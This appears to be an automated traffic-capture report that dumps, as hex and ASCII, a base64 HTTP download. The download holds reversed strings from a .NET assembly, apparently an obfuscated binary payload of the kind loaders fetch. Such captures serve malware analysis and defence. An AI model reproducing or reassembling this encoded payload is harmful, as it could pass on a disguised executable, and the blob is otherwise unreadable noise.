                                                                            2023-03-21 08:11:13 UTC4485INData Raw: 62 61 30 47 4c 59 44 63 68 72 52 7a 38 44 35 62 75 7a 5a 30 4e 77 33 7a 30 50 2f 79 4e 4e 31 77 38 30 71 69 79 7a 75 57 59 4b 6e 6e 67 6a 68 31 4e 6a 61 2b 6c 73 33 35 4c 33 6c 6c 51 33 46 50 52 2b 6e 4c 57 65 71 75 77 57 72 38 42 48 4f 4b 39 75 36 72 4b 63 69 53 35 58 73 65 70 54 59 75 71 77 41 7a 4c 6e 72 48 6c 65 47 61 61 4e 43 32 58 67 4a 61 5a 47 58 34 72 77 42 4d 55 33 76 33 38 55 2b 50 58 45 65 33 50 36 57 54 32 59 6b 2b 33 52 65 56 2b 4e 59 51 37 4d 45 38 65 6e 4f 5a 49 69 58 70 43 6a 6d 74 30 54 7a 56 4a 55 4a 46 2b 65 67 4a 51 74 54 65 37 64 77 4a 4e 59 7a 48 38 72 4a 49 68 67 71 74 42 38 68 39 6b 42 48 35 35 78 4d 37 61 33 78 61 2f 61 38 65 45 31 2f 6c 41 66 39 64 74 59 38 66 34 4e 54 45 47 67 69 52 6c 46 4e 61 41 58 56 43 2b 55 7a 2b 6d 31 55
                                                                            Data Ascii: ba0GLYDchrRz8D5buzZ0Nw3z0P/yNN1w80qiyzuWYKnngjh1Nja+ls35L3llQ3FPR+nLWequwWr8BHOK9u6rKciS5XsepTYuqwAzLnrHleGaaNC2XgJaZGX4rwBMU3v38U+PXEe3P6WT2Yk+3ReV+NYQ7ME8enOZIiXpCjmt0TzVJUJF+egJQtTe7dwJNYzH8rJIhgqtB8h9kBH55xM7a3xa/a8eE1/lAf9dtY8f4NTEGgiRlFNaAXVC+Uz+m1U
                                                                            2023-03-21 08:11:13 UTC4501INData Raw: 50 76 4d 7a 4b 6d 4c 65 35 6d 68 51 78 54 4e 67 37 65 76 70 6d 62 78 4a 6e 70 6c 72 72 35 6e 6c 4b 48 57 55 2f 73 65 78 6d 34 54 31 34 6a 4b 44 39 46 78 56 2f 4e 74 44 39 4d 47 6d 4c 39 70 33 6a 78 6b 6f 63 5a 50 69 6d 6c 39 68 33 37 35 62 38 54 47 38 6b 5a 68 2b 79 72 50 59 54 78 33 79 2b 79 6a 50 70 65 5a 6c 2b 68 4b 76 50 4c 37 53 79 77 34 2f 44 73 2b 79 74 78 35 2f 57 4d 4e 79 7a 53 55 33 6e 2b 76 6f 74 64 6d 45 73 61 53 2b 75 74 71 65 31 74 4a 68 2b 69 43 59 46 30 33 4c 39 77 77 62 6b 72 74 36 50 76 79 59 30 50 31 38 69 43 58 61 48 70 78 79 6a 57 78 47 74 32 53 4e 4d 63 69 78 56 34 46 54 6f 51 55 6a 7a 68 6b 43 63 38 39 70 2f 4b 76 4a 56 65 44 36 38 70 4e 69 50 35 4b 65 33 2f 54 79 78 34 4c 6f 61 78 34 47 72 4a 42 6a 64 6e 4c 61 49 32 47 35 6a 2b 6e
                                                                            Data Ascii: PvMzKmLe5mhQxTNg7evpmbxJnplrr5nlKHWU/sexm4T14jKD9FxV/NtD9MGmL9p3jxkocZPiml9h375b8TG8kZh+yrPYTx3y+yjPpeZl+hKvPL7Syw4/Ds+ytx5/WMNyzSU3n+votdmEsaS+utqe1tJh+iCYF03L9wwbkrt6PvyY0P18iCXaHpxyjWxGt2SNMcixV4FToQUjzhkCc89p/KvJVeD68pNiP5Ke3/Tyx4Loax4GrJBjdnLaI2G5j+n
                                                                            2023-03-21 08:11:13 UTC4517INData Raw: 73 6f 2f 2b 4c 63 42 70 33 36 6b 78 46 69 35 39 6f 51 59 55 50 66 6b 5a 38 36 33 67 36 59 47 55 36 56 38 4a 4b 36 6c 7a 46 6c 48 48 6a 32 36 4b 44 6e 75 4a 38 75 4a 4e 31 58 54 31 74 61 77 37 54 4e 55 63 71 76 39 71 73 52 62 62 6e 35 66 41 79 67 6c 6c 54 4b 79 66 75 46 32 37 76 52 43 47 4d 61 55 68 4d 4b 7a 2f 47 6f 41 2f 48 4a 56 70 58 67 55 6a 73 72 30 45 4c 54 55 41 63 62 4b 66 2b 41 6c 47 52 48 78 51 38 51 64 33 36 42 34 68 43 35 56 48 70 42 56 69 36 58 61 44 6e 68 37 4b 52 6b 48 56 77 36 68 74 35 35 4a 56 41 48 66 68 71 45 78 77 55 33 6e 4d 63 61 4d 63 49 4d 71 66 68 72 55 55 6c 76 30 35 35 41 74 64 43 70 57 32 4f 64 70 45 63 71 79 4d 53 2b 4a 6a 4d 45 4d 42 6f 44 78 57 6e 39 53 71 65 68 6a 58 4a 77 36 6a 46 6e 57 67 53 47 59 4a 44 43 33 43 38 57 57
                                                                            Data Ascii: so/+LcBp36kxFi59oQYUPfkZ863g6YGU6V8JK6lzFlHHj26KDnuJ8uJN1XT1taw7TNUcqv9qsRbbn5fAygllTKyfuF27vRCGMaUhMKz/GoA/HJVpXgUjsr0ELTUAcbKf+AlGRHxQ8Qd36B4hC5VHpBVi6XaDnh7KRkHVw6ht55JVAHfhqExwU3nMcaMcIMqfhrUUlv055AtdCpW2OdpEcqyMS+JjMEMBoDxWn9SqehjXJw6jFnWgSGYJDC3C8WW
                                                                            2023-03-21 08:11:13 UTC4533INData Raw: 65 46 49 4e 55 50 35 38 38 6c 4f 35 74 55 33 35 78 49 4b 64 56 4d 53 44 6a 52 2f 73 36 52 72 69 54 6e 67 64 71 53 49 50 6a 61 4e 31 42 70 54 53 76 4b 67 36 37 30 68 4e 50 32 6d 36 65 54 33 54 38 36 65 43 79 4c 4f 79 6d 36 53 2b 32 2b 39 45 63 48 6b 57 55 52 65 5a 65 31 79 7a 73 59 79 64 49 72 52 49 70 38 65 4d 50 77 6f 65 62 72 68 4f 54 45 38 56 4e 72 59 49 34 62 38 36 65 2b 4e 76 7a 6d 67 63 2f 61 4e 6d 2f 36 61 49 33 69 30 6c 6c 44 71 61 6c 59 71 53 58 2f 70 45 34 57 41 6f 42 51 42 50 5a 74 2f 58 48 58 2f 5a 4f 30 62 48 58 6d 31 4b 58 69 68 4c 6d 67 32 6b 34 45 65 50 45 56 2b 77 34 51 78 35 49 4a 61 5a 67 39 37 57 6a 5a 65 42 4e 76 38 53 35 2b 58 67 77 2f 41 39 70 64 4c 72 57 4c 6b 44 64 54 70 50 65 39 39 6c 33 70 44 30 62 64 70 58 55 66 35 64 69 5a 34
                                                                            Data Ascii: eFINUP588lO5tU35xIKdVMSDjR/s6RriTngdqSIPjaN1BpTSvKg670hNP2m6eT3T86eCyLOym6S+2+9EcHkWUReZe1yzsYydIrRIp8eMPwoebrhOTE8VNrYI4b86e+Nvzmgc/aNm/6aI3i0llDqalYqSX/pE4WAoBQBPZt/XHX/ZO0bHXm1KXihLmg2k4EePEV+w4Qx5IJaZg97WjZeBNv8S5+Xgw/A9pdLrWLkDdTpPe99l3pD0bdpXUf5diZ4
                                                                            2023-03-21 08:11:13 UTC4549INData Raw: 68 62 36 4c 47 72 62 76 39 6b 36 59 52 72 36 74 35 56 58 38 6c 6f 2b 6c 49 6b 6b 75 51 47 30 68 56 7a 32 67 79 4c 5a 41 4a 50 58 39 52 4b 71 65 4e 31 42 6b 7a 39 6f 30 41 33 62 51 33 46 68 6c 41 6c 65 55 75 4e 33 63 5a 4e 2f 31 2f 35 57 48 6a 6f 56 71 55 72 50 70 55 45 71 50 51 4a 4e 33 67 69 79 38 47 6b 30 43 42 64 4a 43 6f 56 34 6f 46 59 45 52 34 53 62 6a 45 2f 2b 62 33 34 73 6c 68 58 66 41 4f 43 54 6c 30 32 50 75 56 35 6c 74 4e 59 58 76 4d 51 4b 73 2b 49 6d 70 61 69 70 33 45 57 68 36 4c 44 43 46 77 52 55 50 5a 38 5a 6b 4a 4e 71 61 65 4e 4f 36 52 77 47 39 79 63 2f 4b 68 54 35 75 4d 6b 46 6f 73 30 76 39 6d 2f 6f 44 47 75 76 2f 33 72 42 2b 63 59 4f 56 51 74 77 31 4e 4f 61 65 46 56 74 52 78 72 30 73 74 4e 48 53 39 58 2f 66 66 33 5a 5a 4d 52 59 37 30 57 53
                                                                            Data Ascii: hb6LGrbv9k6YRr6t5VX8lo+lIkkuQG0hVz2gyLZAJPX9RKqeN1Bkz9o0A3bQ3FhlAleUuN3cZN/1/5WHjoVqUrPpUEqPQJN3giy8Gk0CBdJCoV4oFYER4SbjE/+b34slhXfAOCTl02PuV5ltNYXvMQKs+Impaip3EWh6LDCFwRUPZ8ZkJNqaeNO6RwG9yc/KhT5uMkFos0v9m/oDGuv/3rB+cYOVQtw1NOaeFVtRxr0stNHS9X/ff3ZZMRY70WS
                                                                            2023-03-21 08:11:13 UTC4565INData Raw: 76 55 64 6d 74 4b 49 72 54 70 36 51 6a 41 6e 66 7a 6c 70 75 50 4b 30 51 48 69 74 2f 4e 77 62 46 71 56 57 4d 6f 54 32 4f 72 34 6f 79 69 4a 62 4a 75 51 55 4b 6a 55 68 54 30 33 2b 38 68 4b 71 4f 33 37 73 44 64 71 51 75 4e 54 35 55 4c 70 31 61 52 56 4a 67 79 66 2b 2b 6d 32 4e 65 49 6b 37 4c 4a 70 62 43 70 61 79 4e 61 72 71 6c 75 74 76 52 36 5a 33 57 41 75 61 78 54 79 4a 31 66 4a 66 64 36 47 31 50 5a 63 54 55 37 73 6f 37 51 61 4a 48 54 72 30 75 52 31 78 61 55 53 32 78 44 43 43 59 53 67 77 42 65 4a 62 63 49 36 71 39 72 7a 45 39 62 30 68 76 64 68 75 37 41 39 67 6e 45 64 75 4f 69 56 43 64 2b 61 35 6e 61 36 36 7a 4f 71 30 4d 59 32 31 2b 41 36 52 58 78 68 46 50 44 69 59 49 4b 32 35 39 4e 63 6e 57 64 6f 38 68 64 6b 71 33 42 31 30 5a 37 45 70 42 47 67 49 5a 64 2b 61
                                                                            Data Ascii: vUdmtKIrTp6QjAnfzlpuPK0QHit/NwbFqVWMoT2Or4oyiJbJuQUKjUhT03+8hKqO37sDdqQuNT5ULp1aRVJgyf++m2NeIk7LJpbCpayNarqlutvR6Z3WAuaxTyJ1fJfd6G1PZcTU7so7QaJHTr0uR1xaUS2xDCCYSgwBeJbcI6q9rzE9b0hvdhu7A9gnEduOiVCd+a5na66zOq0MY21+A6RXxhFPDiYIK259NcnWdo8hdkq3B10Z7EpBGgIZd+a
                                                                            2023-03-21 08:11:13 UTC4581INData Raw: 59 79 41 41 41 47 53 67 41 41 41 5a 47 56 30 59 57 52 77 56 58 64 76 55 67 6f 41 41 51 38 41 41 44 6b 7a 4d 57 5a 6d 4e 44 52 6b 4d 6d 4e 69 4e 7a 4d 35 59 6d 51 39 62 6d 56 72 62 31 52 35 5a 55 74 6a 61 57 78 69 64 56 41 67 4c 47 78 68 63 6e 52 31 5a 57 34 39 5a 58 4a 31 64 47 78 31 51 79 41 73 4d 43 34 32 4d 54 45 75 4d 43 34 78 50 57 35 76 61 58 4e 79 5a 56 59 67 4c 48 4a 6c 62 6d 64 70 63 32 56 45 4c 6d 56 30 61 55 78 52 55 79 41 73 62 57 56 30 53 58 68 76 59 6d 78 76 62 31 52 79 5a 58 52 77 59 57 52 42 59 58 52 68 52 47 56 30 61 55 78 52 55 79 35 79 5a 57 35 6e 61 58 4e 6c 52 43 35 6c 64 47 6c 4d 55 56 4f 43 67 41 41 42 69 49 41 41 41 48 4e 6e 59 57 78 47 49 47 52 6c 63 6d 46 6f 55 79 42 76 54 67 38 41 41 52 51 41 41 48 4e 6e 59 57 78 47 49 48 52 73
                                                                            Data Ascii: YyAAAGSgAAAZGV0YWRwVXdvUgoAAQ8AADkzMWZmNDRkMmNiNzM5YmQ9bmVrb1R5ZUtjaWxidVAgLGxhcnR1ZW49ZXJ1dGx1QyAsMC42MTEuMC4xPW5vaXNyZVYgLHJlbmdpc2VELmV0aUxRUyAsbWV0SXhvYmxvb1RyZXRwYWRBYXRhRGV0aUxRUy5yZW5naXNlRC5ldGlMUVOCgAABiIAAAHNnYWxGIGRlcmFoUyBvTg8AARQAAHNnYWxGIHRs
                                                                            2023-03-21 08:11:13 UTC4597INData Raw: 65 43 43 45 67 67 49 34 49 49 53 48 49 4d 53 48 42 79 44 45 67 4c 56 67 68 45 56 41 75 43 43 45 68 79 44 45 67 4c 46 67 68 49 56 44 77 64 52 41 72 69 42 45 61 43 42 45 67 49 44 41 41 72 67 67 68 49 63 67 78 49 43 78 59 49 53 46 51 73 63 48 49 4d 53 41 74 57 43 45 52 55 4a 48 42 79 44 45 67 4c 56 67 68 45 56 41 65 47 43 45 68 55 4f 48 42 79 44 45 67 4c 56 67 68 45 56 41 57 57 42 45 68 55 4f 48 42 79 44 45 67 4c 56 67 68 45 56 41 65 47 43 45 68 58 67 67 68 49 63 67 78 49 63 48 49 4d 53 41 74 57 43 45 52 58 67 67 68 49 63 67 78 49 43 78 59 49 53 46 51 55 48 4b 72 69 42 45 61 43 42 45 75 43 43 45 68 79 44 45 67 4c 46 67 68 49 56 41 67 41 54 34 49 49 53 45 42 79 44 45 67 49 43 41 41 6f 63 48 49 4d 53 41 73 57 43 45 68 55 4a 51 59 45 53 43 42 77 44 42 77 63 63
                                                                            Data Ascii: eCCEggI4IISHIMSHByDEgLVghEVAuCCEhyDEgLFghIVDwdRAriBEaCBEgIDAArgghIcgxICxYISFQscHIMSAtWCERUJHByDEgLVghEVAeGCEhUOHByDEgLVghEVAWWBEhUOHByDEgLVghEVAeGCEhXgghIcgxIcHIMSAtWCERXgghIcgxICxYISFQUHKriBEaCBEuCCEhyDEgLFghIVAgAT4IISEByDEgICAAocHIMSAsWCEhUJQYESCBwDBwcc
                                                                            2023-03-21 08:11:13 UTC4613INData Raw: 41 41 32 41 44 49 41 4e 77 41 35 41 47 49 41 4f 41 41 35 41 44 59 41 5a 51 42 6b 41 44 41 41 4e 77 42 69 41 44 63 41 4f 51 42 6d 41 44 4d 41 4f 51 42 6c 41 44 4d 41 5a 67 42 6d 41 47 45 41 4d 51 41 78 41 44 51 41 5a 51 41 35 41 44 49 41 4e 41 41 35 41 44 49 41 4f 41 42 69 41 47 55 41 4e 51 41 33 41 44 51 41 5a 67 41 33 41 44 6b 41 4f 51 41 32 41 44 55 41 4f 51 41 34 41 44 45 41 4e 41 41 33 41 44 49 41 4e 77 41 30 41 44 51 41 4f 41 42 6b 41 44 55 41 5a 67 42 6d 41 47 51 41 5a 41 41 78 41 44 49 41 4e 67 42 69 41 44 45 41 5a 51 41 30 41 47 4d 41 4e 77 41 34 41 44 59 41 4e 51 42 6c 41 47 51 41 4f 41 41 34 41 44 49 41 59 51 41 31 41 44 41 41 4d 41 41 77 41 44 45 41 4d 41 41 77 41 44 41 41 4d 51 41 77 41 44 41 41 4d 41 41 77 41 44 41 41 4e 41 41 77 41 44 41 41
                                                                            Data Ascii: AA2ADIANwA5AGIAOAA5ADYAZQBkADAANwBiADcAOQBmADMAOQBlADMAZgBmAGEAMQAxADQAZQA5ADIANAA5ADIAOABiAGUANQA3ADQAZgA3ADkAOQA2ADUAOQA4ADEANAA3ADIANwA0ADQAOABkADUAZgBmAGQAZAAxADIANgBiADEAZQA0AGMANwA4ADYANQBlAGQAOAA4ADIAYQA1ADAAMAAwADEAMAAwADAAMQAwADAAMAAwADAANAAwADAA
                                                                            2023-03-21 08:11:13 UTC4629INData Raw: 51 42 79 41 47 4d 41 49 41 42 7a 41 47 45 41 64 77 41 67 41 48 49 41 62 77 42 7a 41 48 49 41 64 51 42 6a 41 43 41 41 5a 41 42 6c 41 47 63 41 59 51 42 75 41 47 45 41 62 51 41 67 41 47 38 41 62 6a 73 41 41 47 34 41 62 77 42 70 41 48 51 41 59 77 42 6c 41 47 34 41 62 67 42 76 41 47 4d 41 49 41 42 6b 41 47 6b 41 62 41 42 68 41 48 59 41 62 67 42 70 4a 51 41 41 64 41 42 75 41 47 55 41 62 51 42 6c 41 48 51 41 59 51 42 30 41 48 4d 41 49 41 42 4d 41 46 45 41 55 77 41 67 41 47 51 41 61 51 42 73 41 47 45 41 64 67 42 75 41 47 6b 72 41 41 42 6c 41 47 77 41 5a 41 42 75 41 47 45 41 61 41 41 67 41 47 51 41 61 51 42 73 41 47 45 41 64 67 42 75 41 47 6b 41 49 41 42 7a 41 47 45 41 61 41 41 67 41 47 34 41 62 77 42 70 41 48 51 41 59 77 42 6c 41 47 34 41 62 67 42 76 41 47 4d 37
                                                                            Data Ascii: QByAGMAIABzAGEAdwAgAHIAbwBzAHIAdQBjACAAZABlAGcAYQBuAGEAbQAgAG8AbjsAAG4AbwBpAHQAYwBlAG4AbgBvAGMAIABkAGkAbABhAHYAbgBpJQAAdABuAGUAbQBlAHQAYQB0AHMAIABMAFEAUwAgAGQAaQBsAGEAdgBuAGkrAABlAGwAZABuAGEAaAAgAGQAaQBsAGEAdgBuAGkAIABzAGEAaAAgAG4AbwBpAHQAYwBlAG4AbgBvAGM7
                                                                            2023-03-21 08:11:13 UTC4645INData Raw: 47 55 41 64 67 42 7a 41 47 59 41 64 67 42 77 41 47 6b 41 65 68 73 41 41 48 4d 41 63 67 42 6c 41 47 63 41 5a 77 42 70 41 48 49 41 64 41 41 67 41 47 55 41 64 67 42 70 41 48 4d 41 63 67 42 31 41 47 4d 41 5a 51 42 79 4a 51 41 41 63 77 42 35 41 47 55 41 61 77 41 67 41 47 34 41 5a 77 42 70 41 47 55 41 63 67 42 76 41 47 59 5a 41 41 42 6c 41 47 30 41 59 51 42 75 41 48 4d 41 5a 67 42 32 44 77 41 41 5a 51 42 74 41 47 45 41 62 67 42 6c 41 48 41 41 65 51 42 30 41 48 51 41 62 41 42 31 41 47 45 41 5a 67 42 6c 41 47 51 66 41 41 42 6c 41 48 41 41 65 51 42 30 41 47 49 41 5a 41 42 30 41 47 77 41 64 51 42 68 41 47 59 41 5a 51 42 6b 47 77 41 41 62 41 42 6c 41 48 59 41 5a 51 42 73 41 47 34 41 62 77 42 70 41 48 51 41 59 51 42 73 41 47 38 41 63 77 42 70 41 43 41 41 64 41 42 73
                                                                            Data Ascii: GUAdgBzAGYAdgBwAGkAehsAAHMAcgBlAGcAZwBpAHIAdAAgAGUAdgBpAHMAcgB1AGMAZQByJQAAcwB5AGUAawAgAG4AZwBpAGUAcgBvAGYZAABlAG0AYQBuAHMAZgB2DwAAZQBtAGEAbgBlAHAAeQB0AHQAbAB1AGEAZgBlAGQfAABlAHAAeQB0AGIAZAB0AGwAdQBhAGYAZQBkGwAAbABlAHYAZQBsAG4AbwBpAHQAYQBsAG8AcwBpACAAdABs
                                                                            2023-03-21 08:11:13 UTC4661INData Raw: 67 42 76 41 47 4d 41 49 41 42 6e 41 47 34 41 61 51 42 79 41 48 51 41 63 31 63 41 41 48 30 41 4d 67 42 34 41 44 6f 41 4d 41 42 37 44 51 41 41 4c 67 42 75 41 47 38 41 61 51 42 30 41 47 4d 41 5a 51 42 75 41 47 34 41 62 77 42 6a 41 43 41 41 5a 51 42 7a 41 47 45 41 59 67 42 68 41 48 51 41 59 51 42 6b 41 43 41 41 63 77 42 70 41 47 67 41 64 41 41 67 41 48 49 41 62 77 42 6d 41 43 41 41 5a 41 42 6c 41 47 77 41 59 67 42 68 41 48 4d 41 61 51 42 6b 41 43 41 41 63 77 42 70 41 43 41 41 63 77 42 6c 41 47 77 41 64 51 42 6b 41 47 38 41 62 51 41 67 41 47 63 41 62 67 42 70 41 48 51 41 59 51 42 6c 41 48 49 41 51 33 55 41 41 43 34 41 63 77 42 6c 41 47 77 41 64 51 42 6b 41 47 38 41 62 51 41 67 41 47 63 41 62 67 42 70 41 48 51 41 59 51 42 6c 41 48 49 41 59 77 41 67 41 48 49 41
                                                                            Data Ascii: gBvAGMAIABnAG4AaQByAHQAc1cAAH0AMgB4ADoAMAB7DQAALgBuAG8AaQB0AGMAZQBuAG4AbwBjACAAZQBzAGEAYgBhAHQAYQBkACAAcwBpAGgAdAAgAHIAbwBmACAAZABlAGwAYgBhAHMAaQBkACAAcwBpACAAcwBlAGwAdQBkAG8AbQAgAGcAbgBpAHQAYQBlAHIAQ3UAAC4AcwBlAGwAdQBkAG8AbQAgAGcAbgBpAHQAYQBlAHIAYwAgAHIA
                                                                            2023-03-21 08:11:13 UTC4677INData Raw: 67 38 41 41 45 55 41 52 77 42 42 41 45 30 41 53 51 73 41 41 46 49 41 51 51 42 49 41 45 4d 4a 41 41 41 34 41 46 49 41 52 51 42 48 41 45 55 41 56 41 42 4f 41 45 6b 52 41 41 42 43 41 45 38 41 54 41 42 43 43 51 41 41 4e 41 41 32 41 46 51 41 54 67 42 4a 41 46 55 4e 41 41 42 5a 41 45 4d 41 54 67 42 46 41 46 49 41 55 67 42 56 41 45 4d 52 41 41 42 55 41 46 67 41 52 51 42 55 41 45 77 41 51 51 42 4e 41 45 6b 41 51 77 42 46 41 45 51 58 41 41 42 46 41 45 30 41 53 51 42 55 41 45 55 41 56 41 42 42 41 45 51 52 41 41 42 45 41 45 6b 41 56 51 42 48 43 51 41 41 55 67 42 42 41 45 67 41 51 77 42 53 41 45 45 41 56 67 42 4f 45 51 41 41 56 41 42 4f 41 45 6b 41 54 51 42 56 41 45 6b 41 52 41 42 46 41 45 30 54 41 41 42 5a 41 46 49 41 51 51 42 4f 41 45 6b 41 51 67 42 53 41 45 45 41
                                                                            Data Ascii: g8AAEUARwBBAE0ASQsAAFIAQQBIAEMJAAA4AFIARQBHAEUAVABOAEkRAABCAE8ATABCCQAANAA2AFQATgBJAFUNAABZAEMATgBFAFIAUgBVAEMRAABUAFgARQBUAEwAQQBNAEkAQwBFAEQXAABFAE0ASQBUAEUAVABBAEQRAABEAEkAVQBHCQAAUgBBAEgAQwBSAEEAVgBOEQAAVABOAEkATQBVAEkARABFAE0TAABZAFIAQQBOAEkAQgBSAEEA
                                                                            2023-03-21 08:11:13 UTC4693INData Raw: 47 46 76 63 6b 4a 6c 64 47 46 53 41 47 56 7a 62 6d 39 77 5a 56 4a 6c 64 47 46 6b 61 57 78 68 56 67 42 79 62 33 52 68 63 6d 56 74 64 57 35 46 64 47 56 48 4c 6d 56 73 59 6d 46 79 5a 57 31 31 62 6b 56 4a 4c 6e 4e 75 62 32 6c 30 59 32 56 73 62 47 39 44 4c 6d 31 6c 64 48 4e 35 55 77 42 79 5a 58 52 7a 59 57 4e 6b 59 57 39 79 51 6d 68 6a 64 47 46 51 41 48 4e 7a 5a 57 4e 76 63 6c 42 74 5a 58 52 7a 65 56 4e 66 41 48 4e 7a 5a 57 4e 76 63 6c 42 30 62 6d 56 70 62 45 4e 66 62 51 42 7a 63 32 56 6a 62 33 4a 51 63 6d 56 31 63 33 4e 70 41 47 56 30 59 58 52 54 64 47 4e 6c 62 47 78 76 51 77 42 6c 64 47 46 30 55 33 52 75 64 57 39 44 41 47 56 30 59 58 52 54 5a 58 4a 68 63 47 31 76 51 77 42 6c 64 47 46 30 55 33 52 6a 5a 57 78 6c 55 77 42 6c 63 32 35 76 63 47 56 53 5a 58 52 6c
                                                                            Data Ascii: GFvckJldGFSAGVzbm9wZVJldGFkaWxhVgByb3RhcmVtdW5FdGVHLmVsYmFyZW11bkVJLnNub2l0Y2VsbG9DLm1ldHN5UwByZXRzYWNkYW9yQmhjdGFQAHNzZWNvclBtZXRzeVNfAHNzZWNvclB0bmVpbENfbQBzc2Vjb3JQcmV1c3NpAGV0YXRTdGNlbGxvQwBldGF0U3RudW9DAGV0YXRTZXJhcG1vQwBldGF0U3RjZWxlUwBlc25vcGVSZXRl
                                                                            2023-03-21 08:11:13 UTC4709INData Raw: 6d 56 34 5a 57 52 75 53 58 52 79 5a 58 5a 6c 55 67 42 79 5a 58 68 6c 5a 47 35 4a 5a 58 52 31 63 47 31 76 51 77 42 79 5a 58 68 6c 5a 47 35 4a 5a 57 52 31 62 47 4e 34 52 51 42 79 5a 58 68 6c 5a 47 35 4a 5a 58 5a 76 54 51 42 6c 62 57 46 4f 5a 47 56 70 5a 6d 6c 73 59 58 56 52 5a 58 52 68 5a 58 4a 44 41 48 4a 6c 65 47 56 6b 62 6b 6c 6c 61 32 46 33 51 51 42 79 5a 58 68 6c 5a 47 35 4a 62 47 56 6a 62 6d 46 44 41 48 4a 6c 65 47 56 6b 62 6b 6c 77 64 58 52 6c 55 77 42 79 5a 58 68 6c 5a 47 35 4a 5a 58 4a 68 63 47 56 79 55 41 42 79 5a 58 68 6c 5a 47 35 4a 64 48 42 31 63 6e 4a 6c 64 47 35 4a 41 48 4a 6c 65 47 56 6b 62 6b 6c 30 61 58 4e 70 56 67 42 79 5a 58 68 6c 5a 47 35 4a 62 6d 6c 6e 62 30 77 41 63 6d 56 34 5a 57 52 75 53 58 52 7a 61 55 77 41 63 6d 56 34 5a 57 52 75
                                                                            Data Ascii: mV4ZWRuSXRyZXZlUgByZXhlZG5JZXR1cG1vQwByZXhlZG5JZWR1bGN4RQByZXhlZG5JZXZvTQBlbWFOZGVpZmlsYXVRZXRhZXJDAHJleGVkbklla2F3QQByZXhlZG5JbGVjbmFDAHJleGVkbklwdXRlUwByZXhlZG5JZXJhcGVyUAByZXhlZG5JdHB1cnJldG5JAHJleGVkbkl0aXNpVgByZXhlZG5Jbmlnb0wAcmV4ZWRuSXRzaUwAcmV4ZWRu
                                                                            2023-03-21 08:11:13 UTC4725INData Raw: 47 31 76 51 77 42 73 5a 57 52 76 54 58 52 7a 5a 58 56 78 5a 58 49 41 62 47 56 6b 62 30 31 73 59 57 4a 76 62 45 64 66 62 51 42 73 5a 57 52 76 54 58 4a 6c 63 48 42 68 62 51 42 73 5a 57 52 76 54 57 35 76 61 58 52 70 62 6d 6c 6d 5a 57 51 41 62 47 56 6b 62 30 31 75 62 32 6c 30 59 57 4e 70 64 47 35 6c 61 48 52 31 51 56 39 74 41 47 78 6c 5a 47 39 4e 64 47 4e 31 5a 47 39 79 55 46 38 41 62 47 56 6b 62 30 31 6b 62 47 56 70 5a 67 42 73 5a 57 52 76 54 57 35 76 61 58 52 6a 5a 57 35 75 62 30 4e 66 62 51 42 73 5a 57 52 76 54 58 4a 6c 61 57 5a 70 64 47 35 6c 5a 45 6c 66 62 51 42 73 5a 57 52 76 54 57 39 6e 62 45 46 66 41 47 78 6c 5a 47 39 4e 63 33 52 7a 5a 56 52 66 41 47 78 6c 5a 47 39 4e 5a 58 56 73 59 56 5a 66 62 51 42 73 5a 57 52 76 54 58 4a 6c 61 48 4e 70 62 47 4a 31
                                                                            Data Ascii: G1vQwBsZWRvTXRzZXVxZXIAbGVkb01sYWJvbEdfbQBsZWRvTXJlcHBhbQBsZWRvTW5vaXRpbmlmZWQAbGVkb01ub2l0YWNpdG5laHR1QV9tAGxlZG9NdGN1ZG9yUF8AbGVkb01kbGVpZgBsZWRvTW5vaXRjZW5ub0NfbQBsZWRvTXJlaWZpdG5lZElfbQBsZWRvTW9nbEFfAGxlZG9Nc3RzZVRfAGxlZG9NZXVsYVZfbQBsZWRvTXJlaHNpbGJ1
                                                                            2023-03-21 08:11:13 UTC4741INData Raw: 57 4e 6c 63 46 4e 79 5a 57 52 70 64 6d 39 79 55 41 42 75 62 32 6c 7a 63 32 56 79 63 48 68 46 63 30 6b 41 5a 57 31 68 54 6d 64 76 62 47 46 30 59 55 4e 6c 63 32 46 43 41 47 35 76 61 58 4e 79 5a 56 5a 33 62 31 4a 7a 53 51 42 75 5a 57 52 6b 61 55 68 7a 53 51 42 6c 63 48 6c 55 59 58 52 68 52 41 42 6b 5a 58 4e 68 61 57 78 42 63 30 6b 41 5a 32 35 76 54 48 4e 4a 41 47 35 76 61 58 52 6a 5a 57 78 73 62 30 4e 35 5a 55 73 41 62 47 56 6b 62 30 31 30 63 6d 56 7a 62 6b 6b 41 4d 32 35 76 61 58 52 6a 5a 57 35 75 62 32 4d 41 4d 6d 56 6a 62 6d 56 79 5a 57 5a 6c 63 67 42 79 61 57 52 66 62 32 34 41 62 47 56 6b 62 30 31 30 5a 58 4e 6c 55 67 42 75 62 32 6c 30 63 47 56 6a 65 45 56 6c 5a 32 35 68 55 6d 5a 50 64 48 56 50 65 47 56 6b 62 6b 6b 41 62 47 46 75 61 57 52 79 54 33 52 6c
                                                                            Data Ascii: WNlcFNyZWRpdm9yUABub2lzc2VycHhFc0kAZW1hTmdvbGF0YUNlc2FCAG5vaXNyZVZ3b1JzSQBuZWRkaUhzSQBlcHlUYXRhRABkZXNhaWxBc0kAZ25vTHNJAG5vaXRjZWxsb0N5ZUsAbGVkb010cmVzbkkAM25vaXRjZW5ub2MAMmVjbmVyZWZlcgByaWRfb24AbGVkb010ZXNlUgBub2l0cGVjeEVlZ25hUmZPdHVPeGVkbkkAbGFuaWRyT3Rl
                                                                            2023-03-21 08:11:13 UTC4757INData Raw: 47 56 6e 62 6d 46 6f 51 32 56 30 59 58 52 54 58 32 52 6b 59 51 42 30 5a 58 4e 7a 59 58 52 70 59 32 6c 73 63 48 68 6c 41 48 4a 6c 64 48 52 6c 55 32 35 31 55 67 42 79 5a 58 52 30 5a 56 4e 30 63 32 39 51 41 48 4a 6c 64 48 52 6c 55 33 4a 6c 64 48 4e 70 5a 32 56 53 41 48 4a 6c 64 48 52 6c 55 32 56 30 59 57 52 70 62 47 46 57 41 48 4a 6c 64 48 52 6c 55 32 56 6b 64 57 78 6a 62 6b 6b 41 62 47 56 6b 62 30 31 30 5a 58 4e 7a 51 51 42 73 5a 57 52 76 54 57 56 6e 59 57 35 68 54 51 42 79 5a 58 52 30 5a 56 4e 30 59 32 56 73 5a 6d 56 53 41 48 4a 6c 64 48 52 6c 55 33 52 75 64 57 39 44 41 48 4a 6c 64 48 52 6c 55 33 52 31 62 32 64 76 54 41 42 79 5a 58 52 30 5a 56 4e 30 61 57 35 4a 41 48 4a 6c 64 48 52 6c 55 33 42 76 55 41 42 79 5a 58 52 30 5a 56 4e 6c 62 47 4a 68 63 32 6c 45
